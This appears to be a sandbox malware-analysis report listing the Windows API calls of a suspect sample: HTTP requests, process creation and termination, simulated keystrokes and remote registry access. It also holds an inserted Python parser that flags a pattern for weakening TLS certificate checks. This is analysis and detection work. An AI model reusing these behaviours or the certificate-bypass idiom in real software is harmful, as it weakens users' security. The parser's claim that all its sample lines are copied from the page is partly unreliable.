                                                                                                                                        • Instruction Fuzzy Hash: 5791B370A00616EADB18EFA0C485BEEFFB4FF54314F108519E85AB7291DF306999CB91
                                                                                                                                        APIs
                                                                                                                                        • SetWindowLongW.USER32(?,000000EB), ref: 0051327E
                                                                                                                                          • Part of subcall function 0051218F: GetClientRect.USER32(?,?), ref: 005121B8
                                                                                                                                          • Part of subcall function 0051218F: GetWindowRect.USER32(?,?), ref: 005121F9
                                                                                                                                          • Part of subcall function 0051218F: ScreenToClient.USER32(?,?), ref: 00512221
                                                                                                                                        • GetDC.USER32 ref: 0054D073
                                                                                                                                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0054D086
                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 0054D094
                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 0054D0A9
                                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 0054D0B1
                                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0054D13C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                        • String ID: U
                                                                                                                                        • API String ID: 4009187628-3372436214
                                                                                                                                        • Opcode ID: 1a54ba4bfdd4d4bb662172637d0583c4a879c3a69117fb3a5fabd3018117c7ff
                                                                                                                                        • Instruction ID: c82111e4084ca97574b1146565298e4bf2e477c18de3ead60887df6d5fb47d57
                                                                                                                                        • Opcode Fuzzy Hash: 1a54ba4bfdd4d4bb662172637d0583c4a879c3a69117fb3a5fabd3018117c7ff
                                                                                                                                        • Instruction Fuzzy Hash: AB71EF30400209EFDF219F64C888AEA7FB5FF49328F14466AED595B1A6D7318D85EF60
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 005129E2: GetWindowLongW.USER32(?,000000EB), ref: 005129F3
                                                                                                                                          • Part of subcall function 00512714: GetCursorPos.USER32(?), ref: 00512727
                                                                                                                                          • Part of subcall function 00512714: ScreenToClient.USER32(005D77B0,?), ref: 00512744
                                                                                                                                          • Part of subcall function 00512714: GetAsyncKeyState.USER32(00000001), ref: 00512769
                                                                                                                                          • Part of subcall function 00512714: GetAsyncKeyState.USER32(00000002), ref: 00512777
                                                                                                                                        • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 0059C69C
                                                                                                                                        • ImageList_EndDrag.COMCTL32 ref: 0059C6A2
                                                                                                                                        • ReleaseCapture.USER32 ref: 0059C6A8
                                                                                                                                        • SetWindowTextW.USER32(?,00000000), ref: 0059C752
                                                                                                                                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0059C765
                                                                                                                                        • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 0059C847
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                                        • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                                        • API String ID: 1924731296-2107944366
                                                                                                                                        • Opcode ID: 4ab542a0246c25ede1df7fd1c3bee83d3f0303b549ab89fff04aea4c939d7b84
                                                                                                                                        • Instruction ID: 7da967f22d506f280124b4179777e3e9bad004b6a5664f7c2c03855a7fdc3165
                                                                                                                                        • Opcode Fuzzy Hash: 4ab542a0246c25ede1df7fd1c3bee83d3f0303b549ab89fff04aea4c939d7b84
                                                                                                                                        • Instruction Fuzzy Hash: 2E518870608205AFEB10EF24CC59FAA7FE1FB99310F00491EF595872E1DB30A948DB52
                                                                                                                                        APIs
                                                                                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0058211C
                                                                                                                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00582148
                                                                                                                                        • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0058218A
                                                                                                                                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0058219F
                                                                                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005821AC
                                                                                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 005821DC
                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00582223
                                                                                                                                          • Part of subcall function 00582B4F: GetLastError.KERNEL32(?,?,00581EE3,00000000,00000000,00000001), ref: 00582B64
                                                                                                                                          • Part of subcall function 00582B4F: SetEvent.KERNEL32(?,?,00581EE3,00000000,00000000,00000001), ref: 00582B79
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2603140658-3916222277
                                                                                                                                        • Opcode ID: 2f17e85f934d58dfa95de2c9ea0fd4dcde97cedf8eed90c4133ef34039c6d292
                                                                                                                                        • Instruction ID: a6cd481c26323d028cb6d5a90f4e4acfe62de4d26176d1b0f6f56345bbaa1ec9
                                                                                                                                        • Opcode Fuzzy Hash: 2f17e85f934d58dfa95de2c9ea0fd4dcde97cedf8eed90c4133ef34039c6d292
                                                                                                                                        • Instruction Fuzzy Hash: 76416AB5501219BEEB12AF50CC89FBB7FACFB49350F104116FE06AA191D770AE449BA1
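The WinINet record above prints its call arguments as raw hex, which hides the two details that matter when reading it: option 0x1F is INTERNET_OPTION_SECURITY_FLAGS, and the query-then-set pair on that option is the idiom code uses to OR SECURITY_FLAG_IGNORE_* bits into a request handle so certificate errors are suppressed. The Python below is an editor's example added here; it is not part of the Joe Sandbox report and not code recovered from the sample. It parses lines in the listing's own format (plain calls, calls without an argument list, "Part of subcall function" lines, and literal string arguments such as the "close all" passed to mciSendStringW), names the constants it recognises (0x1F, HTTP_QUERY_CONTENT_LENGTH = 5, MEM_RELEASE = 0x8000, all fixed by the Windows SDK headers), and flags the security-flags query/set pattern. One caveat is built in: the third argument of InternetSetOptionW is a buffer pointer, so the listed value 00000100 cannot be taken as the flag value from this listing alone; if the dereferenced buffer turned out to be 0x100 that would be SECURITY_FLAG_IGNORE_UNKNOWN_CA, and decode_security_flags is there for the value once it is recovered from the dump. The sample lines are copied from the records on this page; the function and table names are the example's own.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional, Union

# One API line as printed in the Joe Sandbox "APIs" listing, e.g.
#   • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0058219F
#   • GetDC.USER32 ref: 0054D073
#     • Part of subcall function 00582B4F: GetLastError.KERNEL32(?,?), ref: 00582B64
_API_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<func>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# Win32 constants from wininet.h and winnt.h (fixed by the SDK, not by this sample).
INTERNET_OPTION_SECURITY_FLAGS = 0x1F
INTERNET_OPTIONS = {INTERNET_OPTION_SECURITY_FLAGS: "INTERNET_OPTION_SECURITY_FLAGS"}
HTTP_QUERY = {0x05: "HTTP_QUERY_CONTENT_LENGTH", 0x13: "HTTP_QUERY_STATUS_CODE"}
MEM_FLAGS = {0x4000: "MEM_DECOMMIT", 0x8000: "MEM_RELEASE"}
SECURITY_FLAGS = {
    0x0080: "SECURITY_FLAG_IGNORE_REVOCATION",
    0x0100: "SECURITY_FLAG_IGNORE_UNKNOWN_CA",
    0x0200: "SECURITY_FLAG_IGNORE_WRONG_USAGE",
    0x1000: "SECURITY_FLAG_IGNORE_CERT_CN_INVALID",
    0x2000: "SECURITY_FLAG_IGNORE_CERT_DATE_INVALID",
}
# (API name, zero-based argument index) -> table used to name that argument.
_ARG_TABLES = {
    ("InternetQueryOptionW", 1): INTERNET_OPTIONS,
    ("InternetSetOptionW", 1): INTERNET_OPTIONS,
    ("HttpQueryInfoW", 1): HTTP_QUERY,
    ("VirtualFree", 2): MEM_FLAGS,
}

Arg = Union[int, str, None]  # hex immediate, literal string, or '?' (unknown to the sandbox)

@dataclass
class ApiCall:
    func: str
    module: str
    args: List[Arg]
    ref: int                        # address of the call site
    subcall_of: Optional[int] = None
    notes: List[str] = field(default_factory=list)

def _parse_arg(text: str) -> Arg:
    text = text.strip()
    if text == "?":
        return None
    try:
        return int(text, 16)
    except ValueError:              # e.g. the literal "close all" passed to mciSendStringW
        return text

def parse_api_line(line: str) -> Optional[ApiCall]:
    m = _API_RE.match(line)
    if not m:
        return None
    args = [_parse_arg(a) for a in m["args"].split(",")] if m["args"] else []
    call = ApiCall(m["func"], m["module"], args, int(m["ref"], 16),
                   int(m["sub"], 16) if m["sub"] else None)
    for (func, idx), table in _ARG_TABLES.items():
        if call.func == func and idx < len(args) and args[idx] in table:
            call.notes.append(f"arg{idx}={table[args[idx]]}")
    return call

def parse_listing(text: str) -> List[ApiCall]:
    return [c for c in map(parse_api_line, text.splitlines()) if c is not None]

def decode_security_flags(value: int) -> List[str]:
    """Name the SECURITY_FLAG_IGNORE_* bits set in a buffer value recovered from the dump."""
    return [name for bit, name in sorted(SECURITY_FLAGS.items()) if value & bit]

def weakens_tls_validation(calls: List[ApiCall]) -> bool:
    """Query-then-set on INTERNET_OPTION_SECURITY_FLAGS: the idiom used to OR
    SECURITY_FLAG_IGNORE_* bits into a request handle."""
    queried = False
    for c in calls:
        is_sec = len(c.args) > 1 and c.args[1] == INTERNET_OPTION_SECURITY_FLAGS
        if c.func == "InternetQueryOptionW" and is_sec:
            queried = True
        elif c.func == "InternetSetOptionW" and is_sec and queried:
            return True
    return False

# Constructed input: lines copied verbatim from the records on this page.
SAMPLE = """\
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0058211C
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00582148
• InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0058218A
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0058219F
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005821AC
• HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 005821DC
• InternetCloseHandle.WININET(00000000), ref: 00582223
  • Part of subcall function 00582B4F: GetLastError.KERNEL32(?,?,00581EE3,00000000,00000000,00000001), ref: 00582B64
• GetDC.USER32 ref: 0054D073
• mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0051ADE1
• VirtualFree.KERNEL32(?,00000000,00008000), ref: 00552FF6
"""

if __name__ == "__main__":
    calls = parse_listing(SAMPLE)
    for c in calls:
        print(f"{c.ref:08X} {c.func}.{c.module} {c.args} {' '.join(c.notes)}")
    print("TLS validation weakened:", weakens_tls_validation(calls))
```

Run it on the "APIs" lines of any record in this report to get the same annotation; a record that only queries the option, or only sets it, is not flagged, since the flag is a judgement about the pair, not about either call on its own.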
                                                                                                                                        APIs
                                                                                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,?,005A0980), ref: 00589412
                                                                                                                                        • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,005A0980), ref: 00589446
                                                                                                                                        • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 005895C0
                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 005895EA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 560350794-0
                                                                                                                                        • Opcode ID: 6fe32d322904358dfc6af3d621809f27c5eb704e350097a004a41269c2a302ef
                                                                                                                                        • Instruction ID: 1ee3f774c9c7557659c701aabcff7ad0e537c32e8bf594d22c5025029490da8a
                                                                                                                                        • Opcode Fuzzy Hash: 6fe32d322904358dfc6af3d621809f27c5eb704e350097a004a41269c2a302ef
                                                                                                                                        • Instruction Fuzzy Hash: 9EF10B75A00209EFDB14EF94C884EBEBBB5FF89314F148458F916AB251DB31AE45CB50
APIs
• _memset.LIBCMT ref: 0058FD9E
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0058FF31
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0058FF55
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0058FF95
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0058FFB7
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00590133
• GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00590165
• CloseHandle.KERNEL32(?), ref: 00590194
• CloseHandle.KERNEL32(?), ref: 0059020B
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
APIs
  • Part of subcall function 00574BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00573B8A,?), ref: 00574BE0
  • Part of subcall function 00574BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00573B8A,?), ref: 00574BF9
  • Part of subcall function 00574FEC: GetFileAttributesW.KERNEL32(?,00573BFE), ref: 00574FED
• lstrcmpiW.KERNEL32(?,?), ref: 005752FB
• _wcscmp.LIBCMT ref: 00575315
• MoveFileW.KERNEL32(?,?), ref: 00575330
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
APIs
• InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00598D24
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
APIs
• LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0054C638
• ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0054C65A
• LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0054C672
• ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0054C690
• SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0054C6B1
• DestroyIcon.USER32(00000000), ref: 0054C6C0
• SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0054C6DD
• DestroyIcon.USER32(?), ref: 0054C6EC
  • Part of subcall function 0059AAD4: DeleteObject.GDI32(00000000), ref: 0059AB0D
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
APIs
  • Part of subcall function 0056B52D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0056B54D
  • Part of subcall function 0056B52D: GetCurrentThreadId.KERNEL32 ref: 0056B554
  • Part of subcall function 0056B52D: AttachThreadInput.USER32(00000000,?,0056A23B,?,00000001), ref: 0056B55B
• MapVirtualKeyW.USER32(00000025,00000000), ref: 0056A246
• PostMessageW.USER32(?,00000100,00000025,00000000), ref: 0056A263
• Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 0056A266
• MapVirtualKeyW.USER32(00000025,00000000), ref: 0056A26F
• PostMessageW.USER32(?,00000100,00000027,00000000), ref: 0056A28D
• Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0056A290
• MapVirtualKeyW.USER32(00000025,00000000), ref: 0056A299
• PostMessageW.USER32(?,00000101,00000027,00000000), ref: 0056A2B0
• Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0056A2B3
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
APIs
• GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0056915A,00000B00,?,?), ref: 005694E2
• HeapAlloc.KERNEL32(00000000,?,0056915A,00000B00,?,?), ref: 005694E9
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0056915A,00000B00,?,?), ref: 005694FE
• GetCurrentProcess.KERNEL32(?,00000000,?,0056915A,00000B00,?,?), ref: 00569506
• DuplicateHandle.KERNEL32(00000000,?,0056915A,00000B00,?,?), ref: 00569509
• GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0056915A,00000B00,?,?), ref: 00569519
• GetCurrentProcess.KERNEL32(0056915A,00000000,?,0056915A,00000B00,?,?), ref: 00569521
• DuplicateHandle.KERNEL32(00000000,?,0056915A,00000B00,?,?), ref: 00569524
• CreateThread.KERNEL32(00000000,00000000,0056954A,00000000,00000000,00000000), ref: 0056953E
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
Strings
Similarity
• API ID:
• String ID: NULL Pointer assignment$Not an Object type
• API String ID: 0-572801152
APIs
Strings
Similarity
• API ID: Variant$ClearInit$_memset
• String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
• API String ID: 2862541840-625585964
APIs
  • Part of subcall function 00567D28: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00567C62,80070057,?,?,?,00568073), ref: 00567D45
  • Part of subcall function 00567D28: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00567C62,80070057,?,?), ref: 00567D60
  • Part of subcall function 00567D28: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00567C62,80070057,?,?), ref: 00567D6E
  • Part of subcall function 00567D28: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00567C62,80070057,?), ref: 00567D7E
• CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00589EF0
• _memset.LIBCMT ref: 00589EFD
• _memset.LIBCMT ref: 0058A040
• CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 0058A06C
• CoTaskMemFree.OLE32(?), ref: 0058A077
Strings
• NULL Pointer assignment, xrefs: 0058A0C5
Similarity
• API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
• String ID: NULL Pointer assignment
• API String ID: 1300414916-2785691316
APIs
• SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00597449
• SendMessageW.USER32(?,00001036,00000000,?), ref: 0059745D
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00597477
• _wcscat.LIBCMT ref: 005974D2
• SendMessageW.USER32(?,00001057,00000000,?), ref: 005974E9
• SendMessageW.USER32(?,00001061,?,0000000F), ref: 00597517
Strings
Similarity
• API ID: MessageSend$Window_wcscat
• String ID: SysListView32
• API String ID: 307300125-78025650
APIs
  • Part of subcall function 00574148: CreateToolhelp32Snapshot.KERNEL32 ref: 0057416D
  • Part of subcall function 00574148: Process32FirstW.KERNEL32(00000000,?), ref: 0057417B
  • Part of subcall function 00574148: CloseHandle.KERNEL32(00000000), ref: 00574245
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 0058F08D
• GetLastError.KERNEL32 ref: 0058F0A0
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 0058F0CF
• TerminateProcess.KERNEL32(00000000,00000000), ref: 0058F14C
• GetLastError.KERNEL32(00000000), ref: 0058F157
• CloseHandle.KERNEL32(00000000), ref: 0058F18C
Strings
Similarity
• API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
• String ID: SeDebugPrivilege
• API String ID: 2533919879-2896544425
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00574802
• LoadStringW.USER32(00000000), ref: 00574809
• GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0057481F
• LoadStringW.USER32(00000000), ref: 00574826
• _wprintf.LIBCMT ref: 0057484C
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 0057486A
Strings
• %s (%d) : ==> %s: %s %s, xrefs: 00574847
Similarity
• API ID: HandleLoadModuleString$Message_wprintf
• String ID: %s (%d) : ==> %s: %s %s
• API String ID: 3648134473-3128320259
APIs
  • Part of subcall function 005129E2: GetWindowLongW.USER32(?,000000EB), ref: 005129F3
• GetSystemMetrics.USER32(0000000F), ref: 0059DB42
• GetSystemMetrics.USER32(0000000F), ref: 0059DB62
• MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0059DD9D
• SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0059DDBB
• SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0059DDDC
• ShowWindow.USER32(00000003,00000000), ref: 0059DDFB
• InvalidateRect.USER32(?,00000000,00000001), ref: 0059DE20
• DefDlgProcW.USER32(?,00000005,?,?), ref: 0059DE43
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1211466189-0
                                                                                                                                        • Opcode ID: 8e16421a43ac1238d713d9f585a438d166e3801750b12b926b314715706cbd9d
                                                                                                                                        • Instruction ID: 6fe363f490dccee1fed80e4e6e2c8778f78fd3951ac744065cdae1bb5605b925
                                                                                                                                        • Opcode Fuzzy Hash: 8e16421a43ac1238d713d9f585a438d166e3801750b12b926b314715706cbd9d
                                                                                                                                        • Instruction Fuzzy Hash: 50B18731600219AFDF14CF69C9857AE7BB1FF48701F08806AED48AF295D734A994DBA0
APIs
  • Part of subcall function 00521A36: _memmove.LIBCMT ref: 00521A77
  • Part of subcall function 0059147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0059040D,?,?), ref: 00591491
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0059044E
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: BuffCharConnectRegistryUpper_memmove
• String ID:
• API String ID: 3479070676-0
• Opcode ID: 4c8c71df0c80b409df3560efa33664da82af2dd65c51df3891cd668e5e31706a
• Instruction ID: 46ca1bf69e6597035fa056d520c4abf003cc50b36b46acd74349ed828e6bd5b5
• Opcode Fuzzy Hash: 4c8c71df0c80b409df3560efa33664da82af2dd65c51df3891cd668e5e31706a
• Instruction Fuzzy Hash: 58A17A702042029FCB10EF24D889B6EBBE5FF85314F14991DF5969B2A2DB31E985CF46
APIs
• ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0054C508,00000004,00000000,00000000,00000000), ref: 00512E9F
• ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0054C508,00000004,00000000,00000000,00000000,000000FF), ref: 00512EE7
• ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0054C508,00000004,00000000,00000000,00000000), ref: 0054C55B
• ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0054C508,00000004,00000000,00000000,00000000), ref: 0054C5C7
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: ShowWindow
• String ID:
• API String ID: 1268545403-0
• Opcode ID: ad6cff9c45d36fdde815d8c657f531f147f2ebbf7eeb4fd7577564bceca6f6f3
• Instruction ID: c8d9f16b569658384d9d68eaa998ca695bab6900dad9da22e15bf3dbfcf05989
• Opcode Fuzzy Hash: ad6cff9c45d36fdde815d8c657f531f147f2ebbf7eeb4fd7577564bceca6f6f3
• Instruction Fuzzy Hash: E941EB306096849AEB75872888CC7FA7FDABBD6304F544A0EE447876A0D771B9E4E710
APIs
• InterlockedExchange.KERNEL32(?,000001F5), ref: 00577698
  • Part of subcall function 00530FE6: std::exception::exception.LIBCMT ref: 0053101C
  • Part of subcall function 00530FE6: __CxxThrowException@8.LIBCMT ref: 00531031
